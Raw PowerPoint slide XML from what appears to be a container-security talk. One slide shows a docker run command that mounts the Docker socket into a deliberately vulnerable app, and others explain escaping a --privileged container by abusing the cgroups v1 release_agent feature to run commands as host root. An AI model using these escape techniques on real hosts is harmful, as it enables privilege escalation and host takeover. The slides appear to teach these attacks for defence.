                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvna_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/data -p 9090:9090 -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appsecco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvna:sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use case: For running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Further reading: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://jpetazzo.github.io/2015/09/03/do-not-use-docker-in-docker-for-ci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>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58975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pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Attacking Misconfigured Volume mounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838960" y="1391920"/>
            <a:ext cx="8270240" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15011351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pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2032001"/>
            <a:ext cx="9905999" cy="1280160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> abuses the functionality of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notify_on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> feature in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> v1 to run the exploit as a fully privileged root user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463637" y="3349366"/>
            <a:ext cx="5266176" cy="2787092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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6405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Every Developer Says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7775" y="1840281"/>
            <a:ext cx="9906000" cy="3246966"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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422526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pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922694" y="2447331"/>
            <a:ext cx="8502501" cy="2703673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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0788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pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2032000"/>
            <a:ext cx="9905999" cy="4053839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the last task in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> leaves, a command supplied in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>release_agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file is executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To trigger this exploit we need a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>child </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where we can create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>release_agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file and trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>release_agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>killing all processes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgroup.procs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
